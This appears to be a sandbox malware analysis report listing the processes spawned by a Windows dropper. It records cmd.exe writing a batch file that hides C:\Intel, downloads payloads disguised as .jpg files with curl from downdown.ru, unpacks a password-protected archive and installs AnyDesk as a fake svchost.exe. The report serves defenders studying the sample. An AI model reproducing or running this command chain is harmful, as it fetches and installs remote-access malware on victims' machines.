                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:4
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:5
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\attrib.exe" +s +h C:\Intel
                                                                                                                                                                  Imagebase:0x940000
                                                                                                                                                                  File size:19'456 bytes
                                                                                                                                                                  MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:6
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:7
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd ping -n 6 127.0.0.1
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:8
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:9
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:10
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:11
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:12
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:13
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:14
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:15
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:16
                                                                                                                                                                  Start time:01:53:40
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:17
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:18
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:19
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:20
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:21
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:22
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:23
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd start C:\Intel\Trays\Trays.lnk
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:24
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:25
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd svchost.exe --install C:\Intel\AnyDesk
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:26
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:27
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpg
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:28
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:29
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\AnyDesk\bat.lnk
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:30
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:31
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Intel\rezet.cmd" "
                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:32
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff71c380000
                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:33
                                                                                                                                                                  Start time:01:53:41
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:ping -n 6 127.0.0.1
                                                                                                                                                                  Imagebase:0xb00000
                                                                                                                                                                  File size:18'944 bytes
                                                                                                                                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:34
                                                                                                                                                                  Start time:01:53:47
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\curl.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpg
                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                  File size:1'793'024 bytes
                                                                                                                                                                  MD5 hash:9542F4AC0CAEFA766BD67BA879ED2DD4
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:35
                                                                                                                                                                  Start time:01:53:49
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\curl.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpg
                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                  File size:1'793'024 bytes
                                                                                                                                                                  MD5 hash:9542F4AC0CAEFA766BD67BA879ED2DD4
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:36
                                                                                                                                                                  Start time:01:53:51
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\curl.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpg
                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                  File size:1'793'024 bytes
                                                                                                                                                                  MD5 hash:9542F4AC0CAEFA766BD67BA879ED2DD4
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:37
                                                                                                                                                                  Start time:01:53:54
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\curl.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpg
                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                  File size:1'793'024 bytes
                                                                                                                                                                  MD5 hash:9542F4AC0CAEFA766BD67BA879ED2DD4
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:38
                                                                                                                                                                  Start time:01:53:56
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\curl.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpg
                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                  File size:1'793'024 bytes
                                                                                                                                                                  MD5 hash:9542F4AC0CAEFA766BD67BA879ED2DD4
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:39
                                                                                                                                                                  Start time:01:53:57
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\curl.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpg
                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                  File size:1'793'024 bytes
                                                                                                                                                                  MD5 hash:9542F4AC0CAEFA766BD67BA879ED2DD4
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:40
                                                                                                                                                                  Start time:01:54:00
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\driver.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /y
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:300'032 bytes
                                                                                                                                                                  MD5 hash:29086D9247FDF40452563C11B3DCA394
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:41
                                                                                                                                                                  Start time:01:54:01
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\Trays\Trays.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Intel\Trays\Trays.exe" -tray
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:2'019'840 bytes
                                                                                                                                                                  MD5 hash:90D208B856DEA18596D57FFB1DD3A867
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 4%, ReversingLabs
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:42
                                                                                                                                                                  Start time:01:54:01
                                                                                                                                                                  Start date:11/01/2025
                                                                                                                                                                  Path:C:\Intel\svchost.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:svchost.exe --install C:\Intel\AnyDesk
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:5'331'456 bytes
                                                                                                                                                                  MD5 hash:39F35F94DB3D8CD6B2811D1A5C4E5BDA
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                  • Detection: 50%, ReversingLabs
                                                                                                                                                                  Has exited:true

